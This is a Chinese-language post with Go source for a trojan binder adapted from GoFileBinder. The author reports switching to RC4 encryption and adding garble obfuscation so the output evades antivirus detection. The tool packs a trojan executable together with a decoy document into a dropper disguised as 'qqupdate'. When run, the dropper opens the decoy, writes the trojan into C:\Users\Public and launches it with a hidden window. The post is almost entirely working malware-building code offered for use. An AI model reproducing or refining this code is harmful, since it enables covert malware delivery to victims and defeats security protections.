利用https://github.com/Yihsiwei/GoFileBinder改了加密算法和编译混淆。最开始不加混淆是可以过的,可能是测试次数多了,后来加了混淆才能过,后面有时间再改改。

package main

import (
    "crypto/rc4"
    "encoding/base64"
    "fmt"
    "io/ioutil"
    "log"
    "math/rand"
    "os"
    "os/exec"
    "path/filepath"
    "strings"
    "time"
)

var (
    logo = `
    \__  |   |   |  |__   _____|__|_  _  __ ____ |__|
    /   |   |   |  |  \ /  ___/  \ \/ \/ // __ \|  |
    \____   |   |   Y  \\___ \|  |\     /\  ___/|  |
    / ______|___|___|  /____  >__| \/\_/  \___  >__|
    \/               \/     \/                \/   
    `
    tvb = "用 Yihsiwei/GoFileBinder 改了一下加密算法"

    keytishi = `
    首先编译好命令参数如: GoFileBinder.exe    木马.exe xxx.txt
    `
)

func RandStr(length int) string {
    str := "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    bytes := []byte(str)
    result := []byte{}
    rand.Seed(time.Now().UnixNano() + int64(rand.Intn(100)))
    for i := 0; i < length; i++ {
        result = append(result, bytes[rand.Intn(len(bytes))])
    }
    return string(result)
}
func main() {

    fmt.Println(logo)
    fmt.Println(tvb)
    if len(os.Args) != 3 {
        fmt.Println(keytishi)
        return
    }
    mumafile := os.Args[1]
    docfile := os.Args[2]
    key := RandStr(16)

    info, _ := ioutil.ReadFile(mumafile)
    var mumafileStr string = string(info[:])
    AesmumafileStr := rc4encode([]byte(mumafileStr), []byte(key))

    infodoc, _ := ioutil.ReadFile(docfile)
    var docfileStr string = string(infodoc[:])
    AesdocfileStr := rc4encode([]byte(docfileStr), []byte(key))
    SourceCode := fmt.Sprintf(`package main

import (
    "crypto/rc4"
    "encoding/base64"
    "log"
    "os"
    "os/exec"
    "strings"
    "syscall"
)

var (
    key          = "%s"
    mumafilename = "%s"
    docfilename  = "%s"
    docfilenames = "%s"
    docfile      = "%s"

    numafile   = "%s"
    dstFile    = "\\Users\\Public\\qqupdate.DAT"
    selfile, _ = os.Executable()
    ddocfile   = rc4decode([]byte(docfile), []byte(key))
    dmumafile  = rc4decode([]byte(numafile), []byte(key))
)

func main() {
    panfu := selfile[0:2]
    if !strings.Contains(selfile, "C:") {

        dstFile = panfu + "\\qqupdate.DAT"
    } else {
        dstFile = panfu + dstFile
    }
    os.Rename(selfile, dstFile)
    f2, _ := os.Create(docfilename)
    _, _ = f2.Write([]byte(ddocfile))
    f2.Close()
    strccc, _ := os.Getwd()
    cmd := exec.Command("cmd", " /c ", strccc+docfilenames)
    cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
    //cmd2.Stdout = os.Stdout
    _ = cmd.Start()
    var dstFilecc = "C:\\Users\\Public\\" + mumafilename
    f, _ := os.Create(dstFilecc)
    _, _ = f.Write([]byte(dmumafile))
    f.Close()
    _, err := os.Stat(dstFilecc)
    if err == nil {
        cmda := exec.Command(dstFilecc)
        _ = cmda.Start()
    }

}
// RC4解密操作
func rc4decode(str []byte, key []byte) string {
    str, err := base64.StdEncoding.DecodeString(string(str))
    if err != nil {
        log.Fatalln(err)
    }
    cipher2, _ := rc4.NewCipher(key)
    cipher2.XORKeyStream(str, str) // 解密后的数据直接覆盖到str中
    //fmt.Printf("方法2解密后:%s \n\n", str)
    return string(str)
}`, key, strings.Replace(mumafile, "\\", "\\\\", 1), strings.Replace(docfile, "\\", "\\\\", 1), "\\\\"+strings.Replace(docfile, "\\", "\\\\", 1), AesdocfileStr, AesmumafileStr)

    f, _ := os.Create("qqupdate.go")

    _, _ = f.Write([]byte(SourceCode))
    f.Close()

    exitfile("qqupdate.go")
    time.Sleep(time.Duration(1) * time.Second)

    batfile, _ := os.Create("qqupdate.bat")

    _, _ = batfile.Write([]byte("garble -tiny -literals -seed=random build -ldflags=\"-w -s -H windowsgui\" qqupdate.go"))
    //_, _ = batfile.Write([]byte("go build -trimpath -ldflags=\"-w -s -H=windowsgui\" qqupdate.go"))
    batfile.Close()
    exitfile("qqupdate.bat")
    time.Sleep(time.Duration(1) * time.Second)
    cmd := exec.Command("qqupdate.bat")
    _ = cmd.Start()

    exitfile("qqupdate.exe")
    os.RemoveAll("qqupdate.go")
    os.RemoveAll("qqupdate.bat")

}
func exitfile(filename string) {
    for {
        time.Sleep(time.Duration(1) * time.Second)
        _, err := os.Stat(GetCurrentDirectory() + "/" + filename)
        if err == nil {
            break
        }
    }
}
func GetCurrentDirectory() string {
    dir, err := filepath.Abs(filepath.Dir(os.Args[0]))
    if err != nil {
        log.Fatal(err)
    }

    return strings.Replace(dir, "\\", "/", -1)
}

// RC4加密操作
func rc4encode(str []byte, key []byte) string {

    //fmt.Printf("方法2加密前:%s \n", str)
    cipher1, _ := rc4.NewCipher(key)
    cipher1.XORKeyStream(str, str) // 加密后的数据直接覆盖到str中
    encodeString := base64.StdEncoding.EncodeToString([]byte(str))
    //fmt.Printf("方法2加密后:%x \n", encodeString)
    return string(encodeString)
}